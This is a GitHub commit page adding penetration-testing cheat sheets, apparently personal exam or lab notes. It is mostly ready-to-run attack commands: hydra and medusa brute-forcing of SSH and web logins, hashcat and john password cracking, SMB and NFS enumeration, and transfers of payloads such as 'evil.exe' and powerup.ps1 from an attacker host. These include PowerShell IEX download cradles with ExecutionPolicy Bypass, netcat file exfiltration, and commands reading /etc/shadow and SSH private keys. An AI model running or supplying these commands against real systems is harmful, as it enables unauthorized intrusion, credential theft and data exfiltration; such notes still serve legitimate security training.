Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
0fddd71
commit 4a20193
Showing
14 changed files
with
1,034 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
|
||
Cewl | ||
cewl http://<targetip>/ -m 6 -w cewl.txt | ||
wc -l cewl.txt | ||
john --wordlist=cewl.txt --rules --stdout > mutated.txt | ||
wc mutated.txt | ||
medusa -h <targetip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30 | ||
|
||
----------------------------------- | ||
|
||
Hydra | ||
|
||
hydra -l root -P /usr/share/wordlısts/rockyou.txt <targetip> ssh | ||
hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt <targetip> -s 22 ssh -V | ||
|
||
# crack web passwords | ||
http-post-form can change as user module changes | ||
Invalid: what message does the page give for wrong creds | ||
for parameters check with burp | ||
|
||
hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <targetip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 | ||
|
||
----------------------------------- | ||
|
||
Medusa | ||
medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10 | ||
|
||
----------------------------------- | ||
|
||
Hashcat | ||
|
||
# learn the hash type from hashcat.net example hashes page and pass as its m value | ||
# or you can learn with the following command | ||
hashcat -h | grep -i lm | ||
hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt | ||
|
||
----------------------------------- | ||
|
||
LM/NTLM | ||
hashcat -h | grep -i lm | ||
hashcat -m 3000 hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt | ||
|
||
https://hashkiller.co.uk/ | ||
|
||
------------------------------------------ | ||
|
||
When you find some digits, check if it's 32 bit | ||
echo -n ....... | wc -c | ||
|
||
------------------------------------------ | ||
John | ||
john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt | ||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,110 @@ | ||
NMAP | ||
|
||
# Alive hosts | ||
nmap -sn 10.0.0.0/24 | ||
|
||
# scan the 1024 most common ports, run OS detection, run default nmap scripts | ||
nmap -A -oA nmap <targetip> | ||
|
||
# Scan more deeply, scan all 65535 ports on $targetip with a full connect scan | ||
nmap -v -sT <targetip> -p- | ||
|
||
# more options | ||
nmap -sV -sC -v -A <targetip> -p- | ||
nmap -sT -sV -A -O -v -p 1–65535 <targetip> | ||
|
||
# my preference | ||
nmap -sV -sC -v -oA output <targetip> | ||
nmap -p- -v <targetip> | ||
|
||
|
||
------------------------ | ||
|
||
SMB | ||
|
||
Port 139 and 445- SMB/Samba shares | ||
Samba is a service that enables the user to share files with other machines | ||
works the same as a command line FTP client, may browse files without even having credentials | ||
|
||
# Share List: | ||
smbclient --list <targetip> | ||
smbclient -L <targetip> | ||
|
||
# Check SMB vulnerabilities: | ||
nmap --script=smb-check-vulns.nse <targetip> -p445 | ||
|
||
# basic nmap scripts to enumerate shares and OS discovery | ||
nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse | ||
|
||
# Connect using Username | ||
root@kali:~# smbclient -L <targetip> -U username -p 445 | ||
|
||
# Connect to Shares | ||
smbclient \\\\<targetip>\\ShareName | ||
smbclient \\\\<targetip>\\ShareName -U john | ||
|
||
# enumarete with smb-shares, -a “do everything” option | ||
enum4linux -a 192.168.1.120 | ||
|
||
# learn the machine name and then enumerate with smbclient | ||
nmblookup -A 192.168.1.102 | ||
smbclient -L <server_name> -I 192.168.1.105 | ||
|
||
# rpcclient - Connect with a null-session (only works for older windows servers) | ||
rpcclient -U james 10.10.10.52 | ||
rpcclient -U "" 192.168.1.105 | ||
(press enter if asks for a password) | ||
rpcclient $> srvinfo | ||
rpcclient $> enumdomusers | ||
rpcclient $> enumalsgroups domain | ||
rpcclient $> lookupnames administrators | ||
rpcclient> querydominfo | ||
rpcclient> enumdomusers | ||
rpcclient> queryuser john | ||
|
||
# scan for vulnerabilities with nmap | ||
nmap --script "vuln" <targetip> -p139,445 | ||
|
||
------------------------ | ||
|
||
SMTP | ||
|
||
# telnet or netcat connection | ||
nc <targetip> 25 | ||
VRFY root | ||
# Check for commands | ||
nmap -script smtp-commands.nse <targetip> | ||
|
||
------------------------ | ||
|
||
Port 111 - RPC | ||
|
||
Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC: | ||
|
||
rpcbind -p <targetip> | ||
rpcinfo –p x.x.x.x | ||
|
||
# using nmap, see which port NFS is listening | ||
locate *rpc*.nse | ||
nmap --script rpcinfo.nse <targetip> -p 111 | ||
|
||
------------------------- | ||
|
||
NFS | ||
|
||
# to find the public share | ||
locate *nfs*.nse | ||
nmap --script nfs-showmount.nse <targetip> | ||
|
||
# mount the share to a folder under /tmp | ||
mkdir /tmp/nfs | ||
/sbin/mount.nfs <targetip>:/home/box /tmp/nfs | ||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
Searchsploit | ||
# To view the file | ||
searchsploit -x php/webapps/41564.c | ||
|
||
# To see the full path of the file | ||
searchsploit -p php/webapps/41564.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
Python SimpleHTTPServer | ||
|
||
#on Attacker | ||
python -m SimpleHTTPServer | ||
|
||
#on target | ||
wget <attackerip>:8000/filename | ||
|
||
|
||
------------------------------ | ||
|
||
Apache | ||
|
||
#on Attacker | ||
cp filetosend.txt /var/www/html | ||
service apache2 start | ||
|
||
#on target | ||
wget http://attackerip/file | ||
curl http://attackerip/file > file | ||
fetch http://attackerip/file # on BSD | ||
|
||
---------------------------------- | ||
|
||
Netcat (From Target to Kali) | ||
|
||
# Listen on Kali | ||
nc -lvp 4444 > file | ||
|
||
# Send from Target machine | ||
nc <kali_ip> 4444 < file | ||
|
||
----------------- | ||
|
||
|
||
Netcat (From Kali to Target) | ||
|
||
# on target, wait for the file | ||
nc -nvlp 55555 > file | ||
|
||
# on kali, push the file | ||
nc $victimip 55555 < file | ||
|
||
|
||
---------------------- | ||
|
||
Extra: | ||
To send the executable file to your machine: | ||
|
||
base64 executable | ||
# copy the output | ||
# paste it in a file called file.txt | ||
# decode it and create the executable | ||
base64 -d file.txt > executable | ||
|
||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
|
||
-------------------------------------- | ||
TFTP | ||
# Windows XP and Win 2003 contain tftp client. Windows 7 do not by default | ||
# tfpt clients are usually non-interactive, so they could work through an obtained shell | ||
|
||
atftpd --daemon --port 69 /tftp | ||
Windows> tftp -i 192.168.30.45 GET nc.exe | ||
|
||
-------------------------------------- | ||
|
||
FTP (pyftpdlib client on Kali) | ||
# Ftp is generally installed on Windows machines | ||
# To make it interactive, use -s option | ||
|
||
# On Kali install a ftp client and set a username/password | ||
apt-get install python-pyftpdlib | ||
python -m pyftpdlib -p 21 | ||
|
||
# on Windows | ||
ftp <attackerip> | ||
> binary | ||
> get exploit.exe | ||
|
||
------------------------------------------- | ||
|
||
FTP (pureftpd client on Kali) | ||
|
||
# on Kali | ||
|
||
# install ftp client | ||
apt-get install pure-ftpd | ||
# create a group | ||
groupadd ftpgroup | ||
# add a user | ||
useradd -g ftpgroup -d /dev/null -s /etc ftpuser | ||
# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob). | ||
mkdir /root/ftphome | ||
# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish). | ||
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/ | ||
# Update the ftp database after adding our new user. | ||
pure-pw mkdb | ||
# change ownership of the specified ftp directory (and all it's sub-direcotries) | ||
chown -R ftpuser:ftpgroup /root/ftphome | ||
# restart Pure-FTPD | ||
/etc/init.d/pure-ftpd restart | ||
|
||
|
||
# On Windows | ||
echo open <attackerip> 21> ftp.txt | ||
echo USER username password >> ftp.txt | ||
echo bin >> ftp.txt | ||
echo GET evil.exe >> ftp.txt | ||
echo bye >> ftp.txt | ||
ftp -s:ftp.txt | ||
|
||
-------------------------------------- | ||
|
||
Powershell | ||
echo $storageDir = $pwd > wget.ps1 | ||
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 | ||
echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1 | ||
echo $file = "powerup.ps1" >>wget.ps1 | ||
echo $webclient.DownloadFile($url,$file) >>wget.ps1 | ||
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 | ||
|
||
-------------------------------------- | ||
# Powershell download a file | ||
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')" | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,72 @@ | ||
|
||
# priv esc enumeration scripts | ||
https://github.com/rebootuser/LinEnum | ||
https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py | ||
http://pentestmonkey.net/tools/audit/unix-privesc-check | ||
|
||
# Kernel and OS | ||
uname -a | ||
uname -mrs | ||
cat /etc/issue | ||
cat /etc/lsb-release # Debian based | ||
cat /etc/redhat-release # Redhat based | ||
|
||
# running services and find services run boy root | ||
ps aux | ||
ps aux | grep root | ||
|
||
# which applications are installed | ||
dpkg -l | ||
ls -alh /usr/bin/ | ||
ls -alh /sbin/ | ||
|
||
# scheduled tasks | ||
crontab -l | ||
|
||
# port forwarding | ||
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port | ||
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port | ||
|
||
# tunneling | ||
ssh -D 127.0.0.1:9050 -N [username]@[ip] | ||
proxychains ifconfig | ||
|
||
# sensitive files | ||
cat /etc/passwd | ||
cat /etc/group | ||
cat /etc/shadow | ||
ls -alh /var/mail/ | ||
|
||
# check home dirs | ||
ls -ahlR /root/ | ||
ls -ahlR /home | ||
|
||
# private key search | ||
cat ~/.ssh/authorized_keys | ||
cat ~/.ssh/identity.pub | ||
cat ~/.ssh/identity | ||
cat ~/.ssh/id_rsa.pub | ||
cat ~/.ssh/id_rsa | ||
cat ~/.ssh/id_dsa.pub | ||
cat ~/.ssh/id_dsa | ||
cat /etc/ssh/ssh_config | ||
cat /etc/ssh/sshd_config | ||
cat /etc/ssh/ssh_host_dsa_key.pub | ||
cat /etc/ssh/ssh_host_dsa_key | ||
cat /etc/ssh/ssh_host_rsa_key.pub | ||
cat /etc/ssh/ssh_host_rsa_key | ||
cat /etc/ssh/ssh_host_key.pub | ||
cat /etc/ssh/ssh_host_key | ||
|
||
|
||
# Sticky Bits & SUID & GUID | ||
|
||
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. | ||
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. | ||
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. | ||
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID | ||
|
||
|
||
|
||
|
||
|
Oops, something went wrong.